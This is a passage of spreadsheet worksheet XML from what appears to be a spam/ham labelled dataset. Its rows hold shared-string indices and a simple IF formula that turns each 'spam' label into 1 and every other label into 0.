    <row r="2179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2179" t="s">
        <v>7388</v>
      </c>
      <c r="B2179" t="s">
        <v>5294</v>
      </c>
      <c r="C2179" s="1">
        <f>IF(B2179="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2180" t="s">
        <v>7389</v>
      </c>
      <c r="B2180" t="s">
        <v>5294</v>
      </c>
      <c r="C2180" s="1">
        <f>IF(B2180="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2181" t="s">
        <v>7390</v>
      </c>
      <c r="B2181" t="s">
        <v>5294</v>
      </c>
      <c r="C2181" s="1">
        <f>IF(B2181="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2182" t="s">
        <v>7391</v>
      </c>
      <c r="B2182" t="s">
        <v>5294</v>
      </c>
      <c r="C2182" s="1">
        <f>IF(B2182="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2183" t="s">
        <v>7392</v>
      </c>
      <c r="B2183" t="s">
        <v>5294</v>
      </c>
      <c r="C2183" s="1">
        <f>IF(B2183="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2184" t="s">
        <v>7393</v>
      </c>
      <c r="B2184" t="s">
        <v>5294</v>
      </c>
      <c r="C2184" s="1">
        <f>IF(B2184="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2185" t="s">
        <v>7394</v>
      </c>
      <c r="B2185" t="s">
        <v>5294</v>
      </c>
      <c r="C2185" s="1">
        <f>IF(B2185="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2186" t="s">
        <v>7395</v>
      </c>
      <c r="B2186" t="s">
        <v>5294</v>
      </c>
      <c r="C2186" s="1">
        <f>IF(B2186="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2187" t="s">
        <v>7396</v>
      </c>
      <c r="B2187" t="s">
        <v>5294</v>
      </c>
      <c r="C2187" s="1">
        <f>IF(B2187="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2188" t="s">
        <v>7397</v>
      </c>
      <c r="B2188" t="s">
        <v>5294</v>
      </c>
      <c r="C2188" s="1">
        <f>IF(B2188="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2189" t="s">
        <v>7398</v>
      </c>
      <c r="B2189" t="s">
        <v>5294</v>
      </c>
      <c r="C2189" s="1">
        <f>IF(B2189="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2190" t="s">
        <v>7399</v>
      </c>
      <c r="B2190" t="s">
        <v>5297</v>
      </c>
      <c r="C2190" s="1">
        <f>IF(B2190="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2191" t="s">
        <v>7400</v>
      </c>
      <c r="B2191" t="s">
        <v>5294</v>
      </c>
      <c r="C2191" s="1">
        <f>IF(B2191="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2192" t="s">
        <v>7401</v>
      </c>
      <c r="B2192" t="s">
        <v>5294</v>
      </c>
      <c r="C2192" s="1">
        <f>IF(B2192="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2193" t="s">
        <v>7402</v>
      </c>
      <c r="B2193" t="s">
        <v>5294</v>
      </c>
      <c r="C2193" s="1">
        <f>IF(B2193="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2194" t="s">
        <v>7403</v>
      </c>
      <c r="B2194" t="s">
        <v>5294</v>
      </c>
      <c r="C2194" s="1">
        <f>IF(B2194="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2195" t="s">
        <v>7404</v>
      </c>
      <c r="B2195" t="s">
        <v>5294</v>
      </c>
      <c r="C2195" s="1">
        <f>IF(B2195="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2196" t="s">
        <v>7405</v>
      </c>
      <c r="B2196" t="s">
        <v>5294</v>
      </c>
      <c r="C2196" s="1">
        <f>IF(B2196="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2197" t="s">
        <v>7406</v>
      </c>
      <c r="B2197" t="s">
        <v>5294</v>
      </c>
      <c r="C2197" s="1">
        <f>IF(B2197="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2198" t="s">
        <v>7407</v>
      </c>
      <c r="B2198" t="s">
        <v>5294</v>
      </c>
      <c r="C2198" s="1">
        <f>IF(B2198="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2199" t="s">
        <v>7408</v>
      </c>
      <c r="B2199" t="s">
        <v>5294</v>
      </c>
      <c r="C2199" s="1">
        <f>IF(B2199="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2200" t="s">
        <v>7409</v>
      </c>
      <c r="B2200" t="s">
        <v>5294</v>
      </c>
      <c r="C2200" s="1">
        <f>IF(B2200="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2201" t="s">
        <v>7410</v>
      </c>
      <c r="B2201" t="s">
        <v>5294</v>
      </c>
      <c r="C2201" s="1">
        <f>IF(B2201="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2202" t="s">
        <v>7411</v>
      </c>
      <c r="B2202" t="s">
        <v>5294</v>
      </c>
      <c r="C2202" s="1">
        <f>IF(B2202="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2203" t="s">
        <v>7412</v>
      </c>
      <c r="B2203" t="s">
        <v>5294</v>
      </c>
      <c r="C2203" s="1">
        <f>IF(B2203="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2204" t="s">
        <v>7413</v>
      </c>
      <c r="B2204" t="s">
        <v>5294</v>
      </c>
      <c r="C2204" s="1">
        <f>IF(B2204="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2205" t="s">
        <v>7414</v>
      </c>
      <c r="B2205" t="s">
        <v>5294</v>
      </c>
      <c r="C2205" s="1">
        <f>IF(B2205="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2206" t="s">
        <v>7415</v>
      </c>
      <c r="B2206" t="s">
        <v>5294</v>
      </c>
      <c r="C2206" s="1">
        <f>IF(B2206="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2207" t="s">
        <v>7416</v>
      </c>
      <c r="B2207" t="s">
        <v>5294</v>
      </c>
      <c r="C2207" s="1">
        <f>IF(B2207="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2208" t="s">
        <v>7417</v>
      </c>
      <c r="B2208" t="s">
        <v>5297</v>
      </c>
      <c r="C2208" s="1">
        <f>IF(B2208="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2209" t="s">
        <v>7418</v>
      </c>
      <c r="B2209" t="s">
        <v>5294</v>
      </c>
      <c r="C2209" s="1">
        <f>IF(B2209="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2210" t="s">
        <v>7419</v>
      </c>
      <c r="B2210" t="s">
        <v>5297</v>
      </c>
      <c r="C2210" s="1">
        <f>IF(B2210="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2211" t="s">
        <v>7420</v>
      </c>
      <c r="B2211" t="s">
        <v>5294</v>
      </c>
      <c r="C2211" s="1">
        <f>IF(B2211="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2212" t="s">
        <v>7421</v>
      </c>
      <c r="B2212" t="s">
        <v>5294</v>
      </c>
      <c r="C2212" s="1">
        <f>IF(B2212="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2213" t="s">
        <v>7422</v>
      </c>
      <c r="B2213" t="s">
        <v>5294</v>
      </c>
      <c r="C2213" s="1">
        <f>IF(B2213="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2214" t="s">
        <v>7423</v>
      </c>
      <c r="B2214" t="s">
        <v>5294</v>
      </c>
      <c r="C2214" s="1">
        <f>IF(B2214="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2215" t="s">
        <v>7424</v>
      </c>
      <c r="B2215" t="s">
        <v>5294</v>
      </c>
      <c r="C2215" s="1">
        <f>IF(B2215="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2216" t="s">
        <v>7425</v>
      </c>
      <c r="B2216" t="s">
        <v>5294</v>
      </c>
      <c r="C2216" s="1">
        <f>IF(B2216="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2217" t="s">
        <v>5799</v>
      </c>
      <c r="B2217" t="s">
        <v>5294</v>
      </c>
      <c r="C2217" s="1">
        <f>IF(B2217="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2218" t="s">
        <v>7426</v>
      </c>
      <c r="B2218" t="s">
        <v>5294</v>
      </c>
      <c r="C2218" s="1">
        <f>IF(B2218="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2219" t="s">
        <v>7427</v>
      </c>
      <c r="B2219" t="s">
        <v>5294</v>
      </c>
      <c r="C2219" s="1">
        <f>IF(B2219="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2220" t="s">
        <v>7428</v>
      </c>
      <c r="B2220" t="s">
        <v>5294</v>
      </c>
      <c r="C2220" s="1">
        <f>IF(B2220="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2221" t="s">
        <v>7429</v>
      </c>
      <c r="B2221" t="s">
        <v>5297</v>
      </c>
      <c r="C2221" s="1">
        <f>IF(B2221="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2222" t="s">
        <v>7430</v>
      </c>
      <c r="B2222" t="s">
        <v>5294</v>
      </c>
      <c r="C2222" s="1">
        <f>IF(B2222="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2223" t="s">
        <v>7431</v>
      </c>
      <c r="B2223" t="s">
        <v>5294</v>
      </c>
      <c r="C2223" s="1">
        <f>IF(B2223="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2224" t="s">
        <v>7432</v>
      </c>
      <c r="B2224" t="s">
        <v>5294</v>
      </c>
      <c r="C2224" s="1">
        <f>IF(B2224="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2225" t="s">
        <v>7433</v>
      </c>
      <c r="B2225" t="s">
        <v>5297</v>
      </c>
      <c r="C2225" s="1">
        <f>IF(B2225="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2226" t="s">
        <v>7434</v>
      </c>
      <c r="B2226" t="s">
        <v>5294</v>
      </c>
      <c r="C2226" s="1">
        <f>IF(B2226="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2227" t="s">
        <v>7435</v>
      </c>
      <c r="B2227" t="s">
        <v>5294</v>
      </c>
      <c r="C2227" s="1">
        <f>IF(B2227="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2228" t="s">
        <v>7436</v>
      </c>
      <c r="B2228" t="s">
        <v>5294</v>
      </c>
      <c r="C2228" s="1">
        <f>IF(B2228="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2229" t="s">
        <v>7437</v>
      </c>
      <c r="B2229" t="s">
        <v>5294</v>
      </c>
      <c r="C2229" s="1">
        <f>IF(B2229="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2230" t="s">
        <v>7438</v>
      </c>
      <c r="B2230" t="s">
        <v>5294</v>
      </c>
      <c r="C2230" s="1">
        <f>IF(B2230="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2231" t="s">
        <v>7439</v>
      </c>
      <c r="B2231" t="s">
        <v>5294</v>
      </c>
      <c r="C2231" s="1">
        <f>IF(B2231="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2232" t="s">
        <v>7440</v>
      </c>
      <c r="B2232" t="s">
        <v>5294</v>
      </c>
      <c r="C2232" s="1">
        <f>IF(B2232="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2233" t="s">
        <v>7441</v>
      </c>
      <c r="B2233" t="s">
        <v>5294</v>
      </c>
      <c r="C2233" s="1">
        <f>IF(B2233="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2234" t="s">
        <v>7442</v>
      </c>
      <c r="B2234" t="s">
        <v>5294</v>
      </c>
      <c r="C2234" s="1">
        <f>IF(B2234="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2235" t="s">
        <v>6588</v>
      </c>
      <c r="B2235" t="s">
        <v>5294</v>
      </c>
      <c r="C2235" s="1">
        <f>IF(B2235="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2236" t="s">
        <v>7443</v>
      </c>
      <c r="B2236" t="s">
        <v>5294</v>
      </c>
      <c r="C2236" s="1">
        <f>IF(B2236="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2237" t="s">
        <v>7444</v>
      </c>
      <c r="B2237" t="s">
        <v>5294</v>
      </c>
      <c r="C2237" s="1">
        <f>IF(B2237="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2238" t="s">
        <v>7445</v>
      </c>
      <c r="B2238" t="s">
        <v>5294</v>
      </c>
      <c r="C2238" s="1">
        <f>IF(B2238="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2239" t="s">
        <v>7446</v>
      </c>
      <c r="B2239" t="s">
        <v>5294</v>
      </c>
      <c r="C2239" s="1">
        <f>IF(B2239="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2240" t="s">
        <v>7447</v>
      </c>
      <c r="B2240" t="s">
        <v>5294</v>
      </c>
      <c r="C2240" s="1">
        <f>IF(B2240="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2241" t="s">
        <v>7448</v>
      </c>
      <c r="B2241" t="s">
        <v>5294</v>
      </c>
      <c r="C2241" s="1">
        <f>IF(B2241="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2242" t="s">
        <v>7449</v>
      </c>
      <c r="B2242" t="s">
        <v>5294</v>
      </c>
      <c r="C2242" s="1">
        <f>IF(B2242="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2243" t="s">
        <v>7450</v>
      </c>
      <c r="B2243" t="s">
        <v>5294</v>
      </c>
      <c r="C2243" s="1">
        <f>IF(B2243="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2244" t="s">
        <v>7451</v>
      </c>
      <c r="B2244" t="s">
        <v>5294</v>
      </c>
      <c r="C2244" s="1">
        <f>IF(B2244="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2245" t="s">
        <v>7452</v>
      </c>
      <c r="B2245" t="s">
        <v>5294</v>
      </c>
      <c r="C2245" s="1">
        <f>IF(B2245="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2246" t="s">
        <v>7453</v>
      </c>
      <c r="B2246" t="s">
        <v>5294</v>
      </c>
      <c r="C2246" s="1">
        <f>IF(B2246="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2247" t="s">
        <v>7454</v>
      </c>
      <c r="B2247" t="s">
        <v>5294</v>
      </c>
      <c r="C2247" s="1">
        <f>IF(B2247="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2248" t="s">
        <v>7455</v>
      </c>
      <c r="B2248" t="s">
        <v>5297</v>
      </c>
      <c r="C2248" s="1">
        <f>IF(B2248="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2249" t="s">
        <v>7456</v>
      </c>
      <c r="B2249" t="s">
        <v>5297</v>
      </c>
      <c r="C2249" s="1">
        <f>IF(B2249="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2250" t="s">
        <v>7457</v>
      </c>
      <c r="B2250" t="s">
        <v>5294</v>
      </c>
      <c r="C2250" s="1">
        <f>IF(B2250="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2251" t="s">
        <v>7458</v>
      </c>
      <c r="B2251" t="s">
        <v>5297</v>
      </c>
      <c r="C2251" s="1">
        <f>IF(B2251="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2252" t="s">
        <v>7459</v>
      </c>
      <c r="B2252" t="s">
        <v>5294</v>
      </c>
      <c r="C2252" s="1">
        <f>IF(B2252="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2253" t="s">
        <v>7460</v>
      </c>
      <c r="B2253" t="s">
        <v>5294</v>
      </c>
      <c r="C2253" s="1">
        <f>IF(B2253="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2254" t="s">
        <v>7461</v>
      </c>
      <c r="B2254" t="s">
        <v>5294</v>
      </c>
      <c r="C2254" s="1">
        <f>IF(B2254="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2255" t="s">
        <v>7462</v>
      </c>
      <c r="B2255" t="s">
        <v>5294</v>
      </c>
      <c r="C2255" s="1">
        <f>IF(B2255="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2256" t="s">
        <v>7463</v>
      </c>
      <c r="B2256" t="s">
        <v>5294</v>
      </c>
      <c r="C2256" s="1">
        <f>IF(B2256="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2257" t="s">
        <v>7464</v>
      </c>
      <c r="B2257" t="s">
        <v>5294</v>
      </c>
      <c r="C2257" s="1">
        <f>IF(B2257="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2258" t="s">
        <v>7465</v>
      </c>
      <c r="B2258" t="s">
        <v>5294</v>
      </c>
      <c r="C2258" s="1">
        <f>IF(B2258="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2259" t="s">
        <v>7466</v>
      </c>
      <c r="B2259" t="s">
        <v>5294</v>
      </c>
      <c r="C2259" s="1">
        <f>IF(B2259="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2260" t="s">
        <v>7467</v>
      </c>
      <c r="B2260" t="s">
        <v>5294</v>
      </c>
      <c r="C2260" s="1">
        <f>IF(B2260="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2261" t="s">
        <v>7468</v>
      </c>
      <c r="B2261" t="s">
        <v>5294</v>
      </c>
      <c r="C2261" s="1">
        <f>IF(B2261="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2262" t="s">
        <v>7469</v>
      </c>
      <c r="B2262" t="s">
        <v>5297</v>
      </c>
      <c r="C2262" s="1">
        <f>IF(B2262="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2263" t="s">
        <v>7470</v>
      </c>
      <c r="B2263" t="s">
        <v>5294</v>
      </c>
      <c r="C2263" s="1">
        <f>IF(B2263="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2264" t="s">
        <v>7471</v>
      </c>
      <c r="B2264" t="s">
        <v>5294</v>
      </c>
      <c r="C2264" s="1">
        <f>IF(B2264="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2265" t="s">
        <v>7472</v>
      </c>
      <c r="B2265" t="s">
        <v>5297</v>
      </c>
      <c r="C2265" s="1">
        <f>IF(B2265="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2266" t="s">
        <v>6432</v>
      </c>
      <c r="B2266" t="s">
        <v>5294</v>
      </c>
      <c r="C2266" s="1">
        <f>IF(B2266="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2267" t="s">
        <v>5590</v>
      </c>
      <c r="B2267" t="s">
        <v>5294</v>
      </c>
      <c r="C2267" s="1">
        <f>IF(B2267="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2268" t="s">
        <v>7473</v>
      </c>
      <c r="B2268" t="s">
        <v>5297</v>
      </c>
      <c r="C2268" s="1">
        <f>IF(B2268="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2269" t="s">
        <v>7474</v>
      </c>
      <c r="B2269" t="s">
        <v>5294</v>
      </c>
      <c r="C2269" s="1">
        <f>IF(B2269="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2270" t="s">
        <v>7475</v>
      </c>
      <c r="B2270" t="s">
        <v>5297</v>
      </c>
      <c r="C2270" s="1">
        <f>IF(B2270="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2271" t="s">
        <v>7476</v>
      </c>
      <c r="B2271" t="s">
        <v>5294</v>
      </c>
      <c r="C2271" s="1">
        <f>IF(B2271="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2272" t="s">
        <v>7477</v>
      </c>
      <c r="B2272" t="s">
        <v>5294</v>
      </c>
      <c r="C2272" s="1">
        <f>IF(B2272="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2273" t="s">
        <v>7478</v>
      </c>
      <c r="B2273" t="s">
        <v>5294</v>
      </c>
      <c r="C2273" s="1">
        <f>IF(B2273="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2274" t="s">
        <v>7479</v>
      </c>
      <c r="B2274" t="s">
        <v>5294</v>
      </c>
      <c r="C2274" s="1">
        <f>IF(B2274="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2275" t="s">
        <v>7480</v>
      </c>
      <c r="B2275" t="s">
        <v>5294</v>
      </c>
      <c r="C2275" s="1">
        <f>IF(B2275="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2276" t="s">
        <v>7481</v>
      </c>
      <c r="B2276" t="s">
        <v>5294</v>
      </c>
      <c r="C2276" s="1">
        <f>IF(B2276="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2277" t="s">
        <v>7482</v>
      </c>
      <c r="B2277" t="s">
        <v>5294</v>
      </c>
      <c r="C2277" s="1">
        <f>IF(B2277="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2278" t="s">
        <v>5764</v>
      </c>
      <c r="B2278" t="s">
        <v>5294</v>
      </c>
      <c r="C2278" s="1">
        <f>IF(B2278="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2279" t="s">
        <v>7483</v>
      </c>
      <c r="B2279" t="s">
        <v>5294</v>
      </c>
      <c r="C2279" s="1">
        <f>IF(B2279="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2280" t="s">
        <v>7484</v>
      </c>
      <c r="B2280" t="s">
        <v>5294</v>
      </c>
      <c r="C2280" s="1">
        <f>IF(B2280="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2281" t="s">
        <v>7485</v>
      </c>
      <c r="B2281" t="s">
        <v>5294</v>
      </c>
      <c r="C2281" s="1">
        <f>IF(B2281="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2282" t="s">
        <v>7486</v>
      </c>
      <c r="B2282" t="s">
        <v>5294</v>
      </c>
      <c r="C2282" s="1">
        <f>IF(B2282="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
